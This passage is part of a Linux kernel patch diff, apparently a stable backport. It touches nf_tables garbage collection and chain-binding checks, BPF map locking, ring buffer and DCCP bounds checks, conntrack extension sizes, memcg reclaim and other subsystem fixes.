++struct nft_trans_gc *nft_trans_gc_queue_sync(struct nft_trans_gc *gc, gfp_t gfp);
++void nft_trans_gc_queue_sync_done(struct nft_trans_gc *trans);
++
++void nft_trans_gc_elem_add(struct nft_trans_gc *gc, void *priv);
++
++struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
++						 unsigned int gc_seq);
++struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc);
++
++void nft_setelem_data_deactivate(const struct net *net,
++				 const struct nft_set *set,
++				 struct nft_set_elem *elem);
++
+ int __init nft_chain_filter_init(void);
+ void nft_chain_filter_fini(void);
+ 
+@@ -1735,6 +1711,7 @@ struct nftables_pernet {
+ 	u64			table_handle;
+ 	unsigned int		base_seq;
+ 	u8			validate_state;
++	unsigned int		gc_seq;
+ };
+ 
+ extern unsigned int nf_tables_net_id;
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 51b9aa640ad2a..53bc487947197 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -1837,7 +1837,9 @@ union bpf_attr {
+  * 		performed again, if the helper is used in combination with
+  * 		direct packet access.
+  * 	Return
+- * 		0 on success, or a negative error in case of failure.
++ * 		0 on success, or a negative error in case of failure. Positive
++ * 		error indicates a potential drop or congestion in the target
++ * 		device. The particular positive error codes are not defined.
+  *
+  * u64 bpf_get_current_pid_tgid(void)
+  * 	Description
+diff --git a/io_uring/fs.c b/io_uring/fs.c
+index 7100c293c13a8..27676e0150049 100644
+--- a/io_uring/fs.c
++++ b/io_uring/fs.c
+@@ -243,7 +243,7 @@ int io_linkat_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	struct io_link *lnk = io_kiocb_to_cmd(req, struct io_link);
+ 	const char __user *oldf, *newf;
+ 
+-	if (sqe->rw_flags || sqe->buf_index || sqe->splice_fd_in)
++	if (sqe->buf_index || sqe->splice_fd_in)
+ 		return -EINVAL;
+ 	if (unlikely(req->flags & REQ_F_FIXED_FILE))
+ 		return -EBADF;
+diff --git a/kernel/bpf/queue_stack_maps.c b/kernel/bpf/queue_stack_maps.c
+index 8a5e060de63bc..a8fe640318c6c 100644
+--- a/kernel/bpf/queue_stack_maps.c
++++ b/kernel/bpf/queue_stack_maps.c
+@@ -102,7 +102,12 @@ static int __queue_map_get(struct bpf_map *map, void *value, bool delete)
+ 	int err = 0;
+ 	void *ptr;
+ 
+-	raw_spin_lock_irqsave(&qs->lock, flags);
++	if (in_nmi()) {
++		if (!raw_spin_trylock_irqsave(&qs->lock, flags))
++			return -EBUSY;
++	} else {
++		raw_spin_lock_irqsave(&qs->lock, flags);
++	}
+ 
+ 	if (queue_stack_map_is_empty(qs)) {
+ 		memset(value, 0, qs->map.value_size);
+@@ -132,7 +137,12 @@ static int __stack_map_get(struct bpf_map *map, void *value, bool delete)
+ 	void *ptr;
+ 	u32 index;
+ 
+-	raw_spin_lock_irqsave(&qs->lock, flags);
++	if (in_nmi()) {
++		if (!raw_spin_trylock_irqsave(&qs->lock, flags))
++			return -EBUSY;
++	} else {
++		raw_spin_lock_irqsave(&qs->lock, flags);
++	}
+ 
+ 	if (queue_stack_map_is_empty(qs)) {
+ 		memset(value, 0, qs->map.value_size);
+@@ -197,7 +207,12 @@ static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
+ 	if (flags & BPF_NOEXIST || flags > BPF_EXIST)
+ 		return -EINVAL;
+ 
+-	raw_spin_lock_irqsave(&qs->lock, irq_flags);
++	if (in_nmi()) {
++		if (!raw_spin_trylock_irqsave(&qs->lock, irq_flags))
++			return -EBUSY;
++	} else {
++		raw_spin_lock_irqsave(&qs->lock, irq_flags);
++	}
+ 
+ 	if (queue_stack_map_is_full(qs)) {
+ 		if (!replace) {
+diff --git a/kernel/dma/debug.c b/kernel/dma/debug.c
+index 18c93c2276cae..3ff7089d11a92 100644
+--- a/kernel/dma/debug.c
++++ b/kernel/dma/debug.c
+@@ -603,15 +603,19 @@ static struct dma_debug_entry *__dma_entry_alloc(void)
+ 	return entry;
+ }
+ 
+-static void __dma_entry_alloc_check_leak(void)
++/*
++ * This should be called outside of free_entries_lock scope to avoid potential
++ * deadlocks with serial consoles that use DMA.
++ */
++static void __dma_entry_alloc_check_leak(u32 nr_entries)
+ {
+-	u32 tmp = nr_total_entries % nr_prealloc_entries;
++	u32 tmp = nr_entries % nr_prealloc_entries;
+ 
+ 	/* Shout each time we tick over some multiple of the initial pool */
+ 	if (tmp < DMA_DEBUG_DYNAMIC_ENTRIES) {
+ 		pr_info("dma_debug_entry pool grown to %u (%u00%%)\n",
+-			nr_total_entries,
+-			(nr_total_entries / nr_prealloc_entries));
++			nr_entries,
++			(nr_entries / nr_prealloc_entries));
+ 	}
+ }
+ 
+@@ -622,8 +626,10 @@ static void __dma_entry_alloc_check_leak(void)
+  */
+ static struct dma_debug_entry *dma_entry_alloc(void)
+ {
++	bool alloc_check_leak = false;
+ 	struct dma_debug_entry *entry;
+ 	unsigned long flags;
++	u32 nr_entries;
+ 
+ 	spin_lock_irqsave(&free_entries_lock, flags);
+ 	if (num_free_entries == 0) {
+@@ -633,13 +639,17 @@ static struct dma_debug_entry *dma_entry_alloc(void)
+ 			pr_err("debugging out of memory - disabling\n");
+ 			return NULL;
+ 		}
+-		__dma_entry_alloc_check_leak();
++		alloc_check_leak = true;
++		nr_entries = nr_total_entries;
+ 	}
+ 
+ 	entry = __dma_entry_alloc();
+ 
+ 	spin_unlock_irqrestore(&free_entries_lock, flags);
+ 
++	if (alloc_check_leak)
++		__dma_entry_alloc_check_leak(nr_entries);
++
+ #ifdef CONFIG_STACKTRACE
+ 	entry->stack_len = stack_trace_save(entry->stack_entries,
+ 					    ARRAY_SIZE(entry->stack_entries),
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 0f6a92737c912..55d13980e29fd 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -9019,7 +9019,7 @@ void __init init_idle(struct task_struct *idle, int cpu)
+ 	 * PF_KTHREAD should already be set at this point; regardless, make it
+ 	 * look like a proper per-CPU kthread.
+ 	 */
+-	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	idle->flags |= PF_KTHREAD | PF_NO_SETAFFINITY;
+ 	kthread_set_per_cpu(idle, cpu);
+ 
+ #ifdef CONFIG_SMP
+diff --git a/kernel/sched/cpupri.c b/kernel/sched/cpupri.c
+index a286e726eb4b8..42c40cfdf8363 100644
+--- a/kernel/sched/cpupri.c
++++ b/kernel/sched/cpupri.c
+@@ -101,6 +101,7 @@ static inline int __cpupri_find(struct cpupri *cp, struct task_struct *p,
+ 
+ 	if (lowest_mask) {
+ 		cpumask_and(lowest_mask, &p->cpus_mask, vec->mask);
++		cpumask_and(lowest_mask, lowest_mask, cpu_active_mask);
+ 
+ 		/*
+ 		 * We have to ensure that we have at least one bit
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d7..200a0fac03b8e 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -394,6 +394,7 @@ EXPORT_SYMBOL_GPL(play_idle_precise);
+ 
+ void cpu_startup_entry(enum cpuhp_state state)
+ {
++	current->flags |= PF_IDLE;
+ 	arch_cpu_idle_prepare();
+ 	cpuhp_online_idle(state);
+ 	while (1)
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 9fc5db194027b..8c77c54e6348b 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -2684,6 +2684,17 @@ static void symbols_swap_r(void *a, void *b, int size, const void *priv)
+ 	}
+ }
+ 
++static int addrs_check_error_injection_list(unsigned long *addrs, u32 cnt)
++{
++	u32 i;
++
++	for (i = 0; i < cnt; i++) {
++		if (!within_error_injection_list(addrs[i]))
++			return -EINVAL;
++	}
++	return 0;
++}
++
+ int bpf_kprobe_multi_link_attach(const union bpf_attr *attr, struct bpf_prog *prog)
+ {
+ 	struct bpf_kprobe_multi_link *link = NULL;
+@@ -2761,6 +2772,11 @@ int bpf_kprobe_multi_link_attach(const union bpf_attr *attr, struct bpf_prog *pr
+ 			goto error;
+ 	}
+ 
++	if (prog->kprobe_override && addrs_check_error_injection_list(addrs, cnt)) {
++		err = -EINVAL;
++		goto error;
++	}
++
+ 	link = kzalloc(sizeof(*link), GFP_KERNEL);
+ 	if (!link) {
+ 		err = -ENOMEM;
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index de55107aef5d5..2f562cf961e0a 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1142,6 +1142,9 @@ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 	if (full) {
+ 		poll_wait(filp, &work->full_waiters, poll_table);
+ 		work->full_waiters_pending = true;
++		if (!cpu_buffer->shortest_full ||
++		    cpu_buffer->shortest_full > full)
++			cpu_buffer->shortest_full = full;
+ 	} else {
+ 		poll_wait(filp, &work->waiters, poll_table);
+ 		work->waiters_pending = true;
+@@ -2212,6 +2215,8 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 				err = -ENOMEM;
+ 				goto out_err;
+ 			}
++
++			cond_resched();
+ 		}
+ 
+ 		cpus_read_lock();
+@@ -2386,6 +2391,11 @@ rb_iter_head_event(struct ring_buffer_iter *iter)
+ 	 */
+ 	commit = rb_page_commit(iter_head_page);
+ 	smp_rmb();
++
++	/* An event needs to be at least 8 bytes in size */
++	if (iter->head > commit - 8)
++		goto reset;
++
+ 	event = __rb_page_index(iter_head_page, iter->head);
+ 	length = rb_event_length(event);
+ 
+diff --git a/mm/damon/vaddr-test.h b/mm/damon/vaddr-test.h
+index bce37c4875402..e939598aff94b 100644
+--- a/mm/damon/vaddr-test.h
++++ b/mm/damon/vaddr-test.h
+@@ -140,6 +140,8 @@ static void damon_do_test_apply_three_regions(struct kunit *test,
+ 		KUNIT_EXPECT_EQ(test, r->ar.start, expected[i * 2]);
+ 		KUNIT_EXPECT_EQ(test, r->ar.end, expected[i * 2 + 1]);
+ 	}
++
++	damon_destroy_target(t);
+ }
+ 
+ /*
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 67b6d8238b3ed..dacbaf4f7b2c4 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -2545,7 +2545,7 @@ static unsigned long calculate_high_delay(struct mem_cgroup *memcg,
+  * Scheduled by try_charge() to be executed from the userland return path
+  * and reclaims memory over the high limit.
+  */
+-void mem_cgroup_handle_over_high(void)
++void mem_cgroup_handle_over_high(gfp_t gfp_mask)
+ {
+ 	unsigned long penalty_jiffies;
+ 	unsigned long pflags;
+@@ -2573,7 +2573,7 @@ retry_reclaim:
+ 	 */
+ 	nr_reclaimed = reclaim_high(memcg,
+ 				    in_retry ? SWAP_CLUSTER_MAX : nr_pages,
+-				    GFP_KERNEL);
++				    gfp_mask);
+ 
+ 	/*
+ 	 * memory.high is breached and reclaim is unable to keep up. Throttle
+@@ -2809,7 +2809,7 @@ done_restock:
+ 	if (current->memcg_nr_pages_over_high > MEMCG_CHARGE_BATCH &&
+ 	    !(current->flags & PF_MEMALLOC) &&
+ 	    gfpflags_allow_blocking(gfp_mask)) {
+-		mem_cgroup_handle_over_high();
++		mem_cgroup_handle_over_high(gfp_mask);
+ 	}
+ 	return 0;
+ }
+@@ -3842,8 +3842,11 @@ static ssize_t mem_cgroup_write(struct kernfs_open_file *of,
+ 			ret = mem_cgroup_resize_max(memcg, nr_pages, true);
+ 			break;
+ 		case _KMEM:
+-			/* kmem.limit_in_bytes is deprecated. */
+-			ret = -EOPNOTSUPP;
++			pr_warn_once("kmem.limit_in_bytes is deprecated and will be removed. "
++				     "Writing any value to this file has no effect. "
++				     "Please report your usecase to linux-mm@kvack.org if you "
++				     "depend on this functionality.\n");
++			ret = 0;
+ 			break;
+ 		case _TCP:
+ 			ret = memcg_update_tcp_max(memcg, nr_pages);
+diff --git a/mm/slab_common.c b/mm/slab_common.c
+index 0042fb2730d1e..4736c0e6093fa 100644
+--- a/mm/slab_common.c
++++ b/mm/slab_common.c
+@@ -474,7 +474,7 @@ void slab_kmem_cache_release(struct kmem_cache *s)
+ 
+ void kmem_cache_destroy(struct kmem_cache *s)
+ {
+-	int refcnt;
++	int err = -EBUSY;
+ 	bool rcu_set;
+ 
+ 	if (unlikely(!s) || !kasan_check_byte(s))
+@@ -485,17 +485,17 @@ void kmem_cache_destroy(struct kmem_cache *s)
+ 
+ 	rcu_set = s->flags & SLAB_TYPESAFE_BY_RCU;
+ 
+-	refcnt = --s->refcount;
+-	if (refcnt)
++	s->refcount--;
++	if (s->refcount)
+ 		goto out_unlock;
+ 
+-	WARN(shutdown_cache(s),
+-	     "%s %s: Slab cache still has objects when called from %pS",
++	err = shutdown_cache(s);
++	WARN(err, "%s %s: Slab cache still has objects when called from %pS",
+ 	     __func__, s->name, (void *)_RET_IP_);
+ out_unlock:
+ 	mutex_unlock(&slab_mutex);
+ 	cpus_read_unlock();
+-	if (!refcnt && !rcu_set)
++	if (!err && !rcu_set)
+ 		kmem_cache_release(s);
+ }
+ EXPORT_SYMBOL(kmem_cache_destroy);
+diff --git a/net/bridge/br_forward.c b/net/bridge/br_forward.c
+index bd54f17e3c3d8..4e3394a7d7d45 100644
+--- a/net/bridge/br_forward.c
++++ b/net/bridge/br_forward.c
+@@ -124,7 +124,7 @@ static int deliver_clone(const struct net_bridge_port *prev,
+ 
+ 	skb = skb_clone(skb, GFP_ATOMIC);
+ 	if (!skb) {
+-		dev->stats.tx_dropped++;
++		DEV_STATS_INC(dev, tx_dropped);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -263,7 +263,7 @@ static void maybe_deliver_addr(struct net_bridge_port *p, struct sk_buff *skb,
+ 
+ 	skb = skb_copy(skb, GFP_ATOMIC);
+ 	if (!skb) {
+-		dev->stats.tx_dropped++;
++		DEV_STATS_INC(dev, tx_dropped);
+ 		return;
+ 	}
+ 
+diff --git a/net/bridge/br_input.c b/net/bridge/br_input.c
+index 68b3e850bcb9d..6bb272894c960 100644
+--- a/net/bridge/br_input.c
++++ b/net/bridge/br_input.c
+@@ -164,12 +164,12 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 			if ((mdst && mdst->host_joined) ||
+ 			    br_multicast_is_router(brmctx, skb)) {
+ 				local_rcv = true;
+-				br->dev->stats.multicast++;
++				DEV_STATS_INC(br->dev, multicast);
+ 			}
+ 			mcast_hit = true;
+ 		} else {
+ 			local_rcv = true;
+-			br->dev->stats.multicast++;
++			DEV_STATS_INC(br->dev, multicast);
+ 		}
+ 		break;
+ 	case BR_PKT_UNICAST:
+diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c
+index 3288490590f27..0c85c8a9e752f 100644
+--- a/net/core/flow_dissector.c
++++ b/net/core/flow_dissector.c
+@@ -1366,7 +1366,7 @@ proto_again:
+ 			break;
+ 		}
+ 
+-		nhoff += ntohs(hdr->message_length);
++		nhoff += sizeof(struct ptp_header);
+ 		fdret = FLOW_DISSECT_RET_OUT_GOOD;
+ 		break;
+ 	}
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index 8f5d3c0881118..247179d4c8865 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -255,13 +255,8 @@ static int dccp_v4_err(struct sk_buff *skb, u32 info)
+ 	int err;
+ 	struct net *net = dev_net(skb->dev);
+ 
+-	/* For the first __dccp_basic_hdr_len() check, we only need dh->dccph_x,
+-	 * which is in byte 7 of the dccp header.
+-	 * Our caller (icmp_socket_deliver()) already pulled 8 bytes for us.
+-	 *
+-	 * Later on, we want to access the sequence number fields, which are
+-	 * beyond 8 bytes, so we have to pskb_may_pull() ourselves.
+-	 */
++	if (!pskb_may_pull(skb, offset + sizeof(*dh)))
++		return -EINVAL;
+ 	dh = (struct dccp_hdr *)(skb->data + offset);
+ 	if (!pskb_may_pull(skb, offset + __dccp_basic_hdr_len(dh)))
+ 		return -EINVAL;
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 2b09e2644b13f..6fb34eaf1237a 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -83,13 +83,8 @@ static int dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	__u64 seq;
+ 	struct net *net = dev_net(skb->dev);
+ 
+-	/* For the first __dccp_basic_hdr_len() check, we only need dh->dccph_x,
+-	 * which is in byte 7 of the dccp header.
+-	 * Our caller (icmpv6_notify()) already pulled 8 bytes for us.
+-	 *
+-	 * Later on, we want to access the sequence number fields, which are
+-	 * beyond 8 bytes, so we have to pskb_may_pull() ourselves.
+-	 */
++	if (!pskb_may_pull(skb, offset + sizeof(*dh)))
++		return -EINVAL;
+ 	dh = (struct dccp_hdr *)(skb->data + offset);
+ 	if (!pskb_may_pull(skb, offset + __dccp_basic_hdr_len(dh)))
+ 		return -EINVAL;
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index a16f0445023aa..0b01998780952 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -295,13 +295,13 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 
+ 	/* And leave the HSR tag. */
+ 	if (ethhdr->h_proto == htons(ETH_P_HSR)) {
+-		pull_size = sizeof(struct ethhdr);
++		pull_size = sizeof(struct hsr_tag);
+ 		skb_pull(skb, pull_size);
+ 		total_pull_size += pull_size;
+ 	}
+ 
+ 	/* And leave the HSR sup tag. */
+-	pull_size = sizeof(struct hsr_tag);
++	pull_size = sizeof(struct hsr_sup_tag);
+ 	skb_pull(skb, pull_size);
+ 	total_pull_size += pull_size;
+ 
+diff --git a/net/hsr/hsr_main.h b/net/hsr/hsr_main.h
+index 16ae9fb09ccd2..58a5a8b3891ff 100644
+--- a/net/hsr/hsr_main.h
++++ b/net/hsr/hsr_main.h
+@@ -83,7 +83,7 @@ struct hsr_vlan_ethhdr {
+ struct hsr_sup_tlv {
+ 	u8		HSR_TLV_type;
+ 	u8		HSR_TLV_length;
+-};
++} __packed;
+ 
+ /* HSR/PRP Supervision Frame data types.
+  * Field names as defined in the IEC:2010 standard for HSR.
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index a04ffc128e22b..84a0a71a6f4e7 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -1213,6 +1213,7 @@ EXPORT_INDIRECT_CALLABLE(ipv4_dst_check);
+ 
+ static void ipv4_send_dest_unreach(struct sk_buff *skb)
+ {
++	struct net_device *dev;
+ 	struct ip_options opt;
+ 	int res;
+ 
+@@ -1230,7 +1231,8 @@ static void ipv4_send_dest_unreach(struct sk_buff *skb)
+ 		opt.optlen = ip_hdr(skb)->ihl * 4 - sizeof(struct iphdr);
+ 
+ 		rcu_read_lock();
+-		res = __ip_options_compile(dev_net(skb->dev), &opt, skb, NULL);
++		dev = skb->dev ? skb->dev : skb_rtable(skb)->dst.dev;
++		res = __ip_options_compile(dev_net(dev), &opt, skb, NULL);
+ 		rcu_read_unlock();
+ 
+ 		if (res)
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 6b2ef3bb53a3d..0c786ceda5ee6 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -1248,12 +1248,13 @@ static void mptcp_set_rwin(struct tcp_sock *tp, struct tcphdr *th)
+ 
+ 			if (rcv_wnd == rcv_wnd_old)
+ 				break;
+-			if (before64(rcv_wnd_new, rcv_wnd)) {
++
++			rcv_wnd_old = rcv_wnd;
++			if (before64(rcv_wnd_new, rcv_wnd_old)) {
+ 				MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_RCVWNDCONFLICTUPDATE);
+ 				goto raise_win;
+ 			}
+ 			MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_RCVWNDCONFLICT);
+-			rcv_wnd_old = rcv_wnd;
+ 		}
+ 		return;
+ 	}
+diff --git a/net/ncsi/ncsi-aen.c b/net/ncsi/ncsi-aen.c
+index 62fb1031763d1..f8854bff286cb 100644
+--- a/net/ncsi/ncsi-aen.c
++++ b/net/ncsi/ncsi-aen.c
+@@ -89,6 +89,11 @@ static int ncsi_aen_handler_lsc(struct ncsi_dev_priv *ndp,
+ 	if ((had_link == has_link) || chained)
+ 		return 0;
+ 
++	if (had_link)
++		netif_carrier_off(ndp->ndev.dev);
++	else
++		netif_carrier_on(ndp->ndev.dev);
++
+ 	if (!ndp->multi_package && !nc->package->multi_channel) {
+ 		if (had_link) {
+ 			ndp->flags |= NCSI_DEV_RESHUFFLE;
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index 9a6b64779e644..20eede37d5228 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -682,6 +682,14 @@ __ip_set_put(struct ip_set *set)
+ /* set->ref can be swapped out by ip_set_swap, netlink events (like dump) need
+  * a separate reference counter
+  */
++static void
++__ip_set_get_netlink(struct ip_set *set)
++{
++	write_lock_bh(&ip_set_ref_lock);
++	set->ref_netlink++;
++	write_unlock_bh(&ip_set_ref_lock);
++}
++
+ static void
+ __ip_set_put_netlink(struct ip_set *set)
+ {
+@@ -1695,11 +1703,11 @@ call_ad(struct net *net, struct sock *ctnl, struct sk_buff *skb,
+ 
+ 	do {
+ 		if (retried) {
+-			__ip_set_get(set);
++			__ip_set_get_netlink(set);
+ 			nfnl_unlock(NFNL_SUBSYS_IPSET);
+ 			cond_resched();
+ 			nfnl_lock(NFNL_SUBSYS_IPSET);
+-			__ip_set_put(set);
++			__ip_set_put_netlink(set);
+ 		}
+ 
+ 		ip_set_lock(set);
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index 8639e7efd0e22..816283f0aa593 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -384,6 +384,8 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
++	if (!nf_ct_is_confirmed(nfct))
++		nfct->timeout += nfct_time_stamp;
+ 	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+diff --git a/net/netfilter/nf_conntrack_extend.c b/net/netfilter/nf_conntrack_extend.c
+index 0b513f7bf9f39..dd62cc12e7750 100644
+--- a/net/netfilter/nf_conntrack_extend.c
++++ b/net/netfilter/nf_conntrack_extend.c
+@@ -40,10 +40,10 @@ static const u8 nf_ct_ext_type_len[NF_CT_EXT_NUM] = {
+ 	[NF_CT_EXT_ECACHE] = sizeof(struct nf_conntrack_ecache),
+ #endif
+ #ifdef CONFIG_NF_CONNTRACK_TIMESTAMP
+-	[NF_CT_EXT_TSTAMP] = sizeof(struct nf_conn_acct),
++	[NF_CT_EXT_TSTAMP] = sizeof(struct nf_conn_tstamp),
+ #endif
+ #ifdef CONFIG_NF_CONNTRACK_TIMEOUT
+-	[NF_CT_EXT_TIMEOUT] = sizeof(struct nf_conn_tstamp),
++	[NF_CT_EXT_TIMEOUT] = sizeof(struct nf_conn_timeout),
+ #endif
+ #ifdef CONFIG_NF_CONNTRACK_LABELS
+ 	[NF_CT_EXT_LABELS] = sizeof(struct nf_conn_labels),
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 3c5cac9bd9b70..52b81dc1fcf5b 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -31,7 +31,9 @@ static LIST_HEAD(nf_tables_expressions);
+ static LIST_HEAD(nf_tables_objects);
+ static LIST_HEAD(nf_tables_flowtables);
+ static LIST_HEAD(nf_tables_destroy_list);
++static LIST_HEAD(nf_tables_gc_list);
+ static DEFINE_SPINLOCK(nf_tables_destroy_list_lock);
++static DEFINE_SPINLOCK(nf_tables_gc_list_lock);
+ 
+ enum {
+ 	NFT_VALIDATE_SKIP	= 0,
+@@ -122,6 +124,9 @@ static void nft_validate_state_update(struct net *net, u8 new_validate_state)
+ static void nf_tables_trans_destroy_work(struct work_struct *w);
+ static DECLARE_WORK(trans_destroy_work, nf_tables_trans_destroy_work);
+ 
++static void nft_trans_gc_work(struct work_struct *work);
++static DECLARE_WORK(trans_gc_work, nft_trans_gc_work);
++
+ static void nft_ctx_init(struct nft_ctx *ctx,
+ 			 struct net *net,
+ 			 const struct sk_buff *skb,
+@@ -583,10 +588,6 @@ static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
+ 	return __nft_trans_set_add(ctx, msg_type, set, NULL);
+ }
+ 
+-static void nft_setelem_data_deactivate(const struct net *net,
+-					const struct nft_set *set,
+-					struct nft_set_elem *elem);
+-
+ static int nft_mapelem_deactivate(const struct nft_ctx *ctx,
+ 				  struct nft_set *set,
+ 				  const struct nft_set_iter *iter,
+@@ -1210,6 +1211,10 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
+ 	     flags & NFT_TABLE_F_OWNER))
+ 		return -EOPNOTSUPP;
+ 
++	/* No dormant off/on/off/on games in single transaction */
++	if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
++		return -EINVAL;
++
+ 	trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
+ 				sizeof(struct nft_trans_table));
+ 	if (trans == NULL)
+@@ -1422,7 +1427,7 @@ static int nft_flush_table(struct nft_ctx *ctx)
+ 		if (!nft_is_active_next(ctx->net, chain))
+ 			continue;
+ 
+-		if (nft_chain_is_bound(chain))
++		if (nft_chain_binding(chain))
+ 			continue;
+ 
+ 		ctx->chain = chain;
+@@ -1436,8 +1441,7 @@ static int nft_flush_table(struct nft_ctx *ctx)
+ 		if (!nft_is_active_next(ctx->net, set))
+ 			continue;
+ 
+-		if (nft_set_is_anonymous(set) &&
+-		    !list_empty(&set->bindings))
++		if (nft_set_is_anonymous(set))
+ 			continue;
+ 
+ 		err = nft_delset(ctx, set);
+@@ -1467,7 +1471,7 @@ static int nft_flush_table(struct nft_ctx *ctx)
+ 		if (!nft_is_active_next(ctx->net, chain))
+ 			continue;
+ 
+-		if (nft_chain_is_bound(chain))
++		if (nft_chain_binding(chain))
+ 			continue;
+ 
+ 		ctx->chain = chain;
+@@ -2788,6 +2792,9 @@ static int nf_tables_delchain(struct sk_buff *skb, const struct nfnl_info *info,
+ 		return PTR_ERR(chain);
+ 	}
+ 
++	if (nft_chain_binding(chain))
++		return -EOPNOTSUPP;
++
+ 	if (info->nlh->nlmsg_flags & NLM_F_NONREC &&
+ 	    chain->use > 0)
+ 		return -EBUSY;
+@@ -3767,6 +3774,11 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 	}
+ 
+ 	if (info->nlh->nlmsg_flags & NLM_F_REPLACE) {
++		if (nft_chain_binding(chain)) {
++			err = -EOPNOTSUPP;
++			goto err_destroy_flow_rule;
++		}
++
+ 		err = nft_delrule(&ctx, old_rule);
+ 		if (err < 0)
+ 			goto err_destroy_flow_rule;
+@@ -3870,7 +3882,7 @@ static int nf_tables_delrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
+ 			return PTR_ERR(chain);
+ 		}
+-		if (nft_chain_is_bound(chain))
++		if (nft_chain_binding(chain))
+ 			return -EOPNOTSUPP;
+ 	}
+ 
+@@ -3900,7 +3912,7 @@ static int nf_tables_delrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		list_for_each_entry(chain, &table->chains, list) {
+ 			if (!nft_is_active_next(net, chain))
+ 				continue;
+-			if (nft_chain_is_bound(chain))
++			if (nft_chain_binding(chain))
+ 				continue;
+ 
+ 			ctx.chain = chain;
+@@ -4854,6 +4866,7 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	INIT_LIST_HEAD(&set->bindings);
+ 	INIT_LIST_HEAD(&set->catchall_list);
++	refcount_set(&set->refs, 1);
+ 	set->table = table;
+ 	write_pnet(&set->net, net);
+ 	set->ops = ops;
+@@ -4921,6 +4934,14 @@ static void nft_set_catchall_destroy(const struct nft_ctx *ctx,
+ 	}
+ }
+ 
++static void nft_set_put(struct nft_set *set)
++{
++	if (refcount_dec_and_test(&set->refs)) {
++		kfree(set->name);
++		kvfree(set);
++	}
++}
++
+ static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	int i;
+@@ -4933,8 +4954,7 @@ static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)
+ 
+ 	set->ops->destroy(ctx, set);
+ 	nft_set_catchall_destroy(ctx, set);
+-	kfree(set->name);
+-	kvfree(set);
++	nft_set_put(set);
+ }
+ 
+ static int nf_tables_delset(struct sk_buff *skb, const struct nfnl_info *info,
+@@ -5386,8 +5406,12 @@ static int nf_tables_dump_setelem(const struct nft_ctx *ctx,
+ 				  const struct nft_set_iter *iter,
+ 				  struct nft_set_elem *elem)
+ {
++	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+ 	struct nft_set_dump_args *args;
+ 
++	if (nft_set_elem_expired(ext))
++		return 0;
++
+ 	args = container_of(iter, struct nft_set_dump_args, iter);
+ 	return nf_tables_fill_setelem(args->skb, set, elem);
+ }
